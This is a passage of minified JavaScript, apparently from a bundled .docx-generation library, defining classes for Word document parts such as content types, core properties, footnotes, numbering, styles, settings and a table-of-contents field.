b{constructor(){super(...arguments),this.xmlKeys={contentType:"ContentType",partName:"PartName"}}}class zc extends E{constructor(Ce,nt){super("Override"),this.root.push(new g_({contentType:Ce,partName:nt}))}}class M0 extends E{constructor(){super("Types"),this.root.push(new __({xmlns:"http://schemas.openxmlformats.org/package/2006/content-types"})),this.root.push(new ld("image/png","png")),this.root.push(new ld("image/jpeg","jpeg")),this.root.push(new ld("image/jpeg","jpg")),this.root.push(new ld("image/bmp","bmp")),this.root.push(new ld("image/gif","gif")),this.root.push(new ld("application/vnd.openxmlformats-package.relationships+xml","rels")),this.root.push(new ld("application/xml","xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml","/word/document.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml","/word/styles.xml")),this.root.push(new zc("application/vnd.openxmlformats-package.core-properties+xml","/docProps/core.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.custom-properties+xml","/docProps/custom.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.extended-properties+xml","/docProps/app.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.numbering+xml","/word/numbering.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.footnotes+xml","/word/footnotes.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml","/word/settings.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.comments+xml","/word/comments.xml"))}addFooter(Ce){this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml",`/word/footer${Ce}.xml`))}addHeader(Ce){this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml",`/word/header${Ce}.xml`))}}class C_ extends E{constructor(Ce){super("cp:coreProperties"),this.root.push(new ko({cp:"http://schemas.openxmlformats.org/package/2006/metadata/core-properties",dc:"http://purl.org/dc/elements/1.1/",dcterms:"http://purl.org/dc/terms/",dcmitype:"http://purl.org/dc/dcmitype/",xsi:"http://www.w3.org/2001/XMLSchema-instance"})),Ce.title&&this.root.push(new P("dc:title",Ce.title)),Ce.subject&&this.root.push(new P("dc:subject",Ce.subject)),Ce.creator&&this.root.push(new P("dc:creator",Ce.creator)),Ce.keywords&&this.root.push(new P("cp:keywords",Ce.keywords)),Ce.description&&this.root.push(new P("dc:description",Ce.description)),Ce.lastModifiedBy&&this.root.push(new P("cp:lastModifiedBy",Ce.lastModifiedBy)),Ce.revision&&this.root.push(new P("cp:revision",String(Ce.revision))),this.root.push(new y_("dcterms:created")),this.root.push(new y_("dcterms:modified"))}}class y_ extends E{constructor(Ce){super(Ce),this.root.push(new ko({type:"dcterms:W3CDTF"})),this.root.push((0,z.sF)(new Date))}}class v0 extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns",vt:"xmlns:vt"}}}class A0 extends b{constructor(){super(...arguments),this.xmlKeys={fmtid:"fmtid",pid:"pid",name:"name"}}}class Tr extends E{constructor(Ce,nt){super("property"),this.root.push(new A0({fmtid:"{D5CDD505-2E9C-101B-9397-08002B2CF9AE}",pid:Ce.toString(),name:nt.name})),this.root.push(new b_(nt.value))}}class b_ extends E{constructor(Ce){super("vt:lpwstr"),this.root.push(Ce)}}class oC extends E{constructor(Ce){super("Properties"),this.properties=[],this.root.push(new v0({xmlns:"http://schemas.openxmlformats.org/officeDocument/2006/custom-properties",vt:"http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"})),this.nextId=2;for(const nt of Ce)this.addCustomProperty(nt)}prepForXml(Ce){return this.properties.forEach(nt=>this.root.push(nt)),super.prepForXml(Ce)}addCustomProperty(Ce){this.properties.push(new Tr(this.nextId++,Ce))}}class rC extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type"}}}class Ss extends S{constructor(Ce,nt){super("w:ftr",nt),this.refId=Ce,nt||this.root.push(new rC({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape"}))}get ReferenceId(){return this.refId}add(Ce){this.root.push(Ce)}}class hl{constructor(Ce,nt,Dt){this.media=Ce,this.footer=new Ss(nt,Dt),this.relationships=new Hm}add(Ce){this.footer.add(Ce)}addChildElement(Ce){this.footer.addChildElement(Ce)}get View(){return this.footer}get Relationships(){return this.relationships}get Media(){return this.media}}class rr extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",id:"w:id"}}}class fi extends E{constructor(){super("w:footnoteRef")}}class sC extends pt{constructor(){super({style:"FootnoteReference"}),this.root.push(new fi)}}!function(Se){Se.SEPERATOR="separator",Se.CONTINUATION_SEPERATOR="continuationSeparator"}(p_||(p_={}));class ln extends E{constructor(Ce){super("w:footnote"),this.root.push(new rr({type:Ce.type,id:Ce.id}));for(let nt=0;ntdi.charCodeAt(0))):new(ae(8764).Buffer)(Ce,"base64")}}const eh="";var ks,Xd;!function(Se){Se.BULLET="bullet",Se.CARDINAL_TEXT="cardinalText",Se.CHICAGO="chicago",Se.DECIMAL="decimal",Se.DECIMAL_ENCLOSED_CIRCLE="decimalEnclosedCircle",Se.DECIMAL_ENCLOSED_FULLSTOP="decimalEnclosedFullstop",Se.DECIMAL_ENCLOSED_PARENTHESES="decimalEnclosedParen",Se.DECIMAL_ZERO="decimalZero",Se.LOWER_LETTER="lowerLetter",Se.LOWER_ROMAN="lowerRoman",Se.NONE="none",Se.ORDINAL_TEXT="ordinalText",Se.UPPER_LETTER="upperLetter",Se.UPPER_ROMAN="upperRoman"}(ks||(ks={}));class v_ extends b{constructor(){super(...arguments),this.xmlKeys={ilvl:"w:ilvl",tentative:"w15:tentative"}}}class mC extends E{constructor(Ce){super("w:numFmt"),this.root.push(new _({val:Ce}))}}class Yd extends E{constructor(Ce){super("w:lvlText"),this.root.push(new _({val:Ce}))}}class T0 extends E{constructor(Ce){super("w:lvlJc"),this.root.push(new _({val:Ce}))}}!function(Se){Se.NOTHING="nothing",Se.SPACE="space",Se.TAB="tab"}(Xd||(Xd={}));class E0 extends E{constructor(Ce){super("w:suff"),this.root.push(new _({val:Ce}))}}class Nf extends E{constructor(){super("w:isLgl")}}class th extends E{constructor({level:Ce,format:nt,text:Dt,alignment:di=O.START,start:pi=1,style:Hi,suffix:_a,isLegalNumberingStyle:Ya}){if(super("w:lvl"),this.root.push(new M("w:start",(0,z.vH)(pi))),nt&&this.root.push(new mC(nt)),_a&&this.root.push(new E0(_a)),Ya&&this.root.push(new Nf),Dt&&this.root.push(new Yd(Dt)),this.root.push(new T0(di)),this.paragraphProperties=new dl(Hi&&Hi.paragraph),this.runProperties=new $e(Hi&&Hi.run),this.root.push(this.paragraphProperties),this.root.push(this.runProperties),Ce>9)throw new Error("Level cannot be greater than 9. Read more here: https://answers.microsoft.com/en-us/msoffice/forum/all/does-word-support-more-than-9-list-levels/d130fdcd-1781-446d-8c84-c6c79124e4d7");this.root.push(new v_({ilvl:(0,z.vH)(Ce),tentative:1}))}}class A_ extends th{}class jm extends th{}class D0 extends E{constructor(Ce){super("w:multiLevelType"),this.root.push(new _({val:Ce}))}}class x0 extends b{constructor(){super(...arguments),this.xmlKeys={abstractNumId:"w:abstractNumId",restartNumberingAfterBreak:"w15:restartNumberingAfterBreak"}}}class md extends E{constructor(Ce,nt){super("w:abstractNum"),this.root.push(new x0({abstractNumId:(0,z.vH)(Ce),restartNumberingAfterBreak:0})),this.root.push(new D0("hybridMultilevel")),this.id=Ce;for(const Dt of nt)this.root.push(new A_(Dt))}}class uC extends E{constructor(Ce){super("w:abstractNumId"),this.root.push(new _({val:Ce}))}}class Qm extends b{constructor(){super(...arguments),this.xmlKeys={numId:"w:numId"}}}class ih extends E{constructor(Ce){super("w:num"),this.numId=Ce.numId,this.reference=Ce.reference,this.instance=Ce.instance,this.root.push(new Qm({numId:(0,z.vH)(Ce.numId)})),this.root.push(new uC((0,z.vH)(Ce.abstractNumId))),Ce.overrideLevel&&this.root.push(new hC(Ce.overrideLevel.num,Ce.overrideLevel.start))}}class Lf extends b{constructor(){super(...arguments),this.xmlKeys={ilvl:"w:ilvl"}}}class hC extends E{constructor(Ce,nt){super("w:lvlOverride"),this.root.push(new Lf({ilvl:Ce})),void 0!==nt&&this.root.push(new w0(nt))}}class T_ extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class w0 extends E{constructor(Ce){super("w:startOverride"),this.root.push(new T_({val:Ce}))}}class I0 extends E{constructor(Ce){super("w:numbering"),this.abstractNumberingMap=new Map,this.concreteNumberingMap=new Map,this.referenceConfigMap=new Map,this.root.push(new ko({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"}));const nt=new md((0,ha.NY)(),[{level:0,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:(0,ha.vw)(.5),hanging:(0,ha.vw)(.25)}}}},{level:1,format:ks.BULLET,text:"\u25cb",alignment:O.LEFT,style:{paragraph:{indent:{left:(0,ha.vw)(1),hanging:(0,ha.vw)(.25)}}}},{level:2,format:ks.BULLET,text:"\u25a0",alignment:O.LEFT,style:{paragraph:{indent:{left:2160,hanging:(0,ha.vw)(.25)}}}},{level:3,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:2880,hanging:(0,ha.vw)(.25)}}}},{level:4,format:ks.BULLET,text:"\u25cb",alignment:O.LEFT,style:{paragraph:{indent:{left:3600,hanging:(0,ha.vw)(.25)}}}},{level:5,format:ks.BULLET,text:"\u25a0",alignment:O.LEFT,style:{paragraph:{indent:{left:4320,hanging:(0,ha.vw)(.25)}}}},{level:6,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:5040,hanging:(0,ha.vw)(.25)}}}},{level:7,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:5760,hanging:(0,ha.vw)(.25)}}}},{level:8,format:ks.BULLET,text:"\u25cf",alignment:O.LEFT,style:{paragraph:{indent:{left:6480,hanging:(0,ha.vw)(.25)}}}}]);this.concreteNumberingMap.set("default-bullet-numbering",new ih({numId:1,abstractNumId:nt.id,reference:"default-bullet-numbering",instance:0,overrideLevel:{num:0,start:1}})),this.abstractNumberingMap.set("default-bullet-numbering",nt);for(const Dt of Ce.config)this.abstractNumberingMap.set(Dt.reference,new md((0,ha.NY)(),Dt.levels)),this.referenceConfigMap.set(Dt.reference,Dt.levels)}prepForXml(Ce){for(const nt of this.abstractNumberingMap.values())this.root.push(nt);for(const nt of this.concreteNumberingMap.values())this.root.push(nt);return super.prepForXml(Ce)}createConcreteNumberingInstance(Ce,nt){const Dt=this.abstractNumberingMap.get(Ce);if(!Dt)return;const di=`${Ce}-${nt}`;if(this.concreteNumberingMap.has(di))return;const pi=this.referenceConfigMap.get(Ce),Hi=pi&&pi[0].start,_a={numId:(0,ha.NY)(),abstractNumId:Dt.id,reference:Ce,instance:nt,overrideLevel:Hi&&Number.isInteger(Hi)?{num:0,start:Hi}:{num:0,start:1}};this.concreteNumberingMap.set(di,new ih(_a))}get ConcreteNumbering(){return Array.from(this.concreteNumberingMap.values())}get ReferenceConfig(){return Array.from(this.referenceConfigMap.values())}}class _l extends b{constructor(){super(...arguments),this.xmlKeys={version:"w:val",name:"w:name",uri:"w:uri"}}}class R0 extends E{constructor(Ce){super("w:compatSetting"),this.root.push(new _l({version:Ce,uri:"http://schemas.microsoft.com/office/word",name:"compatibilityMode"}))}}class ah extends E{constructor(Ce){super("w:compat"),void 0!==Ce.doNotExpandShiftReturn&&this.root.push(new l("w:doNotExpandShiftReturn",Ce.doNotExpandShiftReturn)),Ce.version&&this.root.push(new R0(Ce.version))}}class $m extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable"}}}class E_ extends E{constructor(Ce){super("w:settings"),this.root.push(new $m({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"})),this.root.push(new l("w:displayBackgroundShape",!0)),void 0!==Ce.trackRevisions&&this.root.push(new l("w:trackRevisions",Ce.trackRevisions)),void 0!==Ce.evenAndOddHeaders&&this.root.push(new l("w:evenAndOddHeaders",Ce.evenAndOddHeaders)),void 0!==Ce.updateFields&&this.root.push(new l("w:updateFields",Ce.updateFields)),this.root.push(new ah({version:Ce.compatabilityModeVersion||15}))}}class Jd extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Km extends E{constructor(Ce){super("w:name"),this.root.push(new Jd({val:Ce}))}}class S0 extends E{constructor(Ce){super("w:uiPriority"),this.root.push(new Jd({val:(0,z.vH)(Ce)}))}}class D_ extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",styleId:"w:styleId",default:"w:default",customStyle:"w:customStyle"}}}class x_ extends E{constructor(Ce,nt){super("w:style"),this.root.push(new D_(Ce)),nt.name&&this.root.push(new Km(nt.name)),nt.basedOn&&this.root.push(new v("w:basedOn",nt.basedOn)),nt.next&&this.root.push(new v("w:next",nt.next)),nt.link&&this.root.push(new v("w:link",nt.link)),void 0!==nt.uiPriority&&this.root.push(new S0(nt.uiPriority)),void 0!==nt.semiHidden&&this.root.push(new l("w:semiHidden",nt.semiHidden)),void 0!==nt.unhideWhenUsed&&this.root.push(new l("w:unhideWhenUsed",nt.unhideWhenUsed)),void 0!==nt.quickFormat&&this.root.push(new l("w:qFormat",nt.quickFormat))}}class Zd extends x_{constructor(Ce){super({type:"paragraph",styleId:Ce.id},Ce),this.paragraphProperties=new dl(Ce.paragraph),this.runProperties=new $e(Ce.run),this.root.push(this.paragraphProperties),this.root.push(this.runProperties)}}class ud extends x_{constructor(Ce){super({type:"character",styleId:Ce.id},Object.assign({uiPriority:99,unhideWhenUsed:!0},Ce)),this.runProperties=new $e(Ce.run),this.root.push(this.runProperties)}}class gl extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{basedOn:"Normal",next:"Normal",quickFormat:!0}))}}class nh extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Title",name:"Title"}))}}class Xm extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading1",name:"Heading 1"}))}}class k0 extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading2",name:"Heading 2"}))}}class w_ extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading3",name:"Heading 3"}))}}class zf extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading4",name:"Heading 4"}))}}class Ym extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading5",name:"Heading 5"}))}}class fC extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Heading6",name:"Heading 6"}))}}class ba extends gl{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Strong",name:"Strong"}))}}class Us extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"ListParagraph",name:"List Paragraph",basedOn:"Normal",quickFormat:!0}))}}class I_ extends Zd{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteText",name:"footnote text",link:"FootnoteTextChar",basedOn:"Normal",uiPriority:99,semiHidden:!0,unhideWhenUsed:!0,paragraph:{spacing:{after:0,line:240,lineRule:qt.AUTO}},run:{size:20}}))}}class P0 extends ud{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteReference",name:"footnote reference",basedOn:"DefaultParagraphFont",semiHidden:!0,run:{superScript:!0}}))}}class Vr extends ud{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"FootnoteTextChar",name:"Footnote Text Char",basedOn:"DefaultParagraphFont",link:"FootnoteText",semiHidden:!0,run:{size:20}}))}}class Jm extends ud{constructor(Ce){super(Object.assign(Object.assign({},Ce),{id:"Hyperlink",name:"Hyperlink",basedOn:"DefaultParagraphFont",run:{color:"0563C1",underline:{type:le.SINGLE}}}))}}class Hl extends E{constructor(Ce){if(super("w:styles"),Ce.initialStyles&&this.root.push(Ce.initialStyles),Ce.importedStyles)for(const nt of Ce.importedStyles)this.root.push(nt);if(Ce.paragraphStyles)for(const nt of Ce.paragraphStyles)this.root.push(new Zd(nt));if(Ce.characterStyles)for(const nt of Ce.characterStyles)this.root.push(new ud(nt))}}class em extends E{constructor(Ce){super("w:pPrDefault"),this.root.push(new dl(Ce))}}class R_ extends E{constructor(Ce){super("w:rPrDefault"),this.root.push(new $e(Ce))}}class Wf extends E{constructor(Ce){super("w:docDefaults"),this.runPropertiesDefaults=new R_(Ce.run),this.paragraphPropertiesDefaults=new em(Ce.paragraph),this.root.push(this.runPropertiesDefaults),this.root.push(this.paragraphPropertiesDefaults)}}class tm{newInstance(Ce){const nt=(0,y.xml2js)(Ce,{compact:!1});let Dt;for(const pi of nt.elements||[])"w:styles"===pi.name&&(Dt=pi);if(void 0===Dt)throw new Error("can not find styles element");const di=Dt.elements||[];return new Hl({initialStyles:new w(Dt.attributes),importedStyles:di.map(pi=>A(pi))})}}class pC{newInstance(Ce={}){var nt;return{initialStyles:new ko({mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",Ignorable:"w14 w15"}),importedStyles:[new Wf(null!==(nt=Ce.document)&&void 0!==nt?nt:{}),new nh(Object.assign({run:{size:56}},Ce.title)),new Xm(Object.assign({run:{color:"2E74B5",size:32}},Ce.heading1)),new k0(Object.assign({run:{color:"2E74B5",size:26}},Ce.heading2)),new w_(Object.assign({run:{color:"1F4D78",size:24}},Ce.heading3)),new zf(Object.assign({run:{color:"2E74B5",italics:!0}},Ce.heading4)),new Ym(Object.assign({run:{color:"2E74B5"}},Ce.heading5)),new fC(Object.assign({run:{color:"1F4D78"}},Ce.heading6)),new ba(Object.assign({run:{bold:!0}},Ce.strong)),new Us(Ce.listParagraph||{}),new Jm(Ce.hyperlink||{}),new P0(Ce.footnoteReference||{}),new I_(Ce.footnoteText||{}),new Vr(Ce.footnoteTextChar||{})]}}}class S_{constructor(Ce,nt={}){var Dt,di,pi,Hi,_a,Ya,ca;if(this.currentRelationshipId=1,this.headers=[],this.footers=[],this.coreProperties=new C_(Object.assign(Object.assign({},Ce),{creator:null!==(Dt=Ce.creator)&&void 0!==Dt?Dt:"Un-named",revision:null!==(di=Ce.revision)&&void 0!==di?di:1,lastModifiedBy:null!==(pi=Ce.lastModifiedBy)&&void 0!==pi?pi:"Un-named"})),this.numbering=new I0(Ce.numbering?Ce.numbering:{config:[]}),this.comments=new Jp(null!==(Hi=Ce.comments)&&void 0!==Hi?Hi:{children:[]}),this.fileRelationships=new Hm,this.customProperties=new oC(null!==(_a=Ce.customProperties)&&void 0!==_a?_a:[]),this.appProperties=new nC,this.footnotesWrapper=new M_,this.contentTypes=new M0,this.documentWrapper=new uo({background:Ce.background||{}}),this.settings=new E_({compatabilityModeVersion:Ce.compatabilityModeVersion,evenAndOddHeaders:!!Ce.evenAndOddHeaderAndFooters,trackRevisions:null===(Ya=Ce.features)||void 0===Ya?void 0:Ya.trackRevisions,updateFields:null===(ca=Ce.features)||void 0===ca?void 0:ca.updateFields}),this.media=nt.template&&nt.template.media?nt.template.media:new dd,nt.template&&(this.currentRelationshipId=nt.template.currentRelationshipId+1),nt.template&&Ce.externalStyles)throw Error("can not use both template and external styles");if(nt.template&&nt.template.styles){const ka=new tm;this.styles=ka.newInstance(nt.template.styles)}else if(Ce.externalStyles){const ka=new tm;this.styles=ka.newInstance(Ce.externalStyles)}else if(Ce.styles){const ka=(new pC).newInstance(Ce.styles.default);this.styles=new Hl(Object.assign(Object.assign({},ka),Ce.styles))}else{const ka=new pC;this.styles=new Hl(ka.newInstance())}if(this.addDefaultRelationships(),nt.template&&nt.template.headers)for(const ka of nt.template.headers)this.addHeaderToDocument(ka.header,ka.type);if(nt.template&&nt.template.footers)for(const ka of nt.template.footers)this.addFooterToDocument(ka.footer,ka.type);for(const ka of Ce.sections)this.addSection(ka);if(Ce.footnotes)for(const ka in Ce.footnotes)this.footnotesWrapper.View.createFootNote(parseFloat(ka),Ce.footnotes[ka].children)}addSection({headers:Ce={},footers:nt={},children:Dt,properties:di}){this.documentWrapper.View.Body.addSection(Object.assign(Object.assign({},di),{headerWrapperGroup:{default:Ce.default?this.createHeader(Ce.default):void 0,first:Ce.first?this.createHeader(Ce.first):void 0,even:Ce.even?this.createHeader(Ce.even):void 0},footerWrapperGroup:{default:nt.default?this.createFooter(nt.default):void 0,first:nt.first?this.createFooter(nt.first):void 0,even:nt.even?this.createFooter(nt.even):void 0}}));for(const pi of Dt)this.documentWrapper.View.add(pi)}createHeader(Ce){const nt=new pl(this.media,this.currentRelationshipId++);for(const Dt of Ce.options.children)nt.add(Dt);return this.addHeaderToDocument(nt),nt}createFooter(Ce){const nt=new hl(this.media,this.currentRelationshipId++);for(const Dt of Ce.options.children)nt.add(Dt);return this.addFooterToDocument(nt),nt}addHeaderToDocument(Ce,nt=Pt.DEFAULT){this.headers.push({header:Ce,type:nt}),this.documentWrapper.Relationships.createRelationship(Ce.View.ReferenceId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/header",`header${this.headers.length}.xml`),this.contentTypes.addHeader(this.headers.length)}addFooterToDocument(Ce,nt=Pt.DEFAULT){this.footers.push({footer:Ce,type:nt}),this.documentWrapper.Relationships.createRelationship(Ce.View.ReferenceId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer",`footer${this.footers.length}.xml`),this.contentTypes.addFooter(this.footers.length)}addDefaultRelationships(){this.fileRelationships.createRelationship(1,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument","word/document.xml"),this.fileRelationships.createRelationship(2,"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties","docProps/core.xml"),this.fileRelationships.createRelationship(3,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties","docProps/app.xml"),this.fileRelationships.createRelationship(4,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties","docProps/custom.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles","styles.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering","numbering.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes","footnotes.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings","settings.xml"),this.documentWrapper.Relationships.createRelationship(this.currentRelationshipId++,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments","comments.xml")}get Document(){return this.documentWrapper}get Styles(){return this.styles}get CoreProperties(){return this.coreProperties}get Numbering(){return this.numbering}get Media(){return this.media}get FileRelationships(){return this.fileRelationships}get Headers(){return this.headers.map(Ce=>Ce.header)}get Footers(){return this.footers.map(Ce=>Ce.footer)}get ContentTypes(){return this.contentTypes}get CustomProperties(){return this.customProperties}get AppProperties(){return this.appProperties}get FootNotes(){return this.footnotesWrapper}get Settings(){return this.settings}get Comments(){return this.comments}}const ni="";class O0 extends E{constructor(Ce={}){super("w:instrText"),this.properties=Ce,this.root.push(new Be({space:ee.PRESERVE}));let nt="TOC";this.properties.captionLabel&&(nt=`${nt} \\a "${this.properties.captionLabel}"`),this.properties.entriesFromBookmark&&(nt=`${nt} \\b "${this.properties.entriesFromBookmark}"`),this.properties.captionLabelIncludingNumbers&&(nt=`${nt} \\c "${this.properties.captionLabelIncludingNumbers}"`),this.properties.sequenceAndPageNumbersSeparator&&(nt=`${nt} \\d "${this.properties.sequenceAndPageNumbersSeparator}"`),this.properties.tcFieldIdentifier&&(nt=`${nt} \\f "${this.properties.tcFieldIdentifier}"`),this.properties.hyperlink&&(nt=`${nt} \\h`),this.properties.tcFieldLevelRange&&(nt=`${nt} \\l "${this.properties.tcFieldLevelRange}"`),this.properties.pageNumbersEntryLevelsRange&&(nt=`${nt} \\n "${this.properties.pageNumbersEntryLevelsRange}"`),this.properties.headingStyleRange&&(nt=`${nt} \\o "${this.properties.headingStyleRange}"`),this.properties.entryAndPageNumberSeparator&&(nt=`${nt} \\p "${this.properties.entryAndPageNumberSeparator}"`),this.properties.seqFieldIdentifierForPrefix&&(nt=`${nt} \\s "${this.properties.seqFieldIdentifierForPrefix}"`),this.properties.stylesWithLevels&&this.properties.stylesWithLevels.length&&(nt=`${nt} \\t "${this.properties.stylesWithLevels.map(Dt=>`${Dt.styleName},${Dt.level}`).join(",")}"`),this.properties.useAppliedParagraphOutlineLevel&&(nt=`${nt} \\u`),this.properties.preserveTabInEntries&&(nt=`${nt} \\w`),this.properties.preserveNewLineInEntries&&(nt=`${nt} \\x`),this.properties.hideTabAndPageNumbersInWebView&&(nt=`${nt} \\z`),this.root.push(nt)}}class _C extends E{constructor(){super("w:sdtContent")}}class ps extends b{constructor(){super(...arguments),this.xmlKeys={alias:"w:val"}}}class Ff extends E{constructor(Ce){super("w:alias"),this.root.push(new ps({alias:Ce}))}}class WM extends E{constructor(Ce){super("w:sdtPr"),this.root.push(new Ff(Ce))}}class FM extends E{constructor(Ce="Table of Contents",nt){super("w:sdt"),this.root.push(new WM(Ce));const Dt=new _C,di=new uc({children:[new pt({children:[new Ue(!0),new O0(nt),new Xe]})]});Dt.addChildElement(di);const pi=new uc({children:[new pt({children:[new He]})]});Dt.addChildElement(pi),this.root.push(Dt)}}class gC{constructor(Ce,nt){this.styleName=Ce,this.level=nt}}class im{constructor(Ce={children:[]}){this.options=Ce}}class VM{constructor(Ce={children:[]}){this.options=Ce}}class CC extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class Er extends E{constructor(Ce){super("w:footnoteReference"),this.root.push(new CC({id:Ce}))}}class k_ extends pt{constructor(Ce){super({style:"FootnoteReference"}),this.root.push(new Er(Ce))}}class oh extends 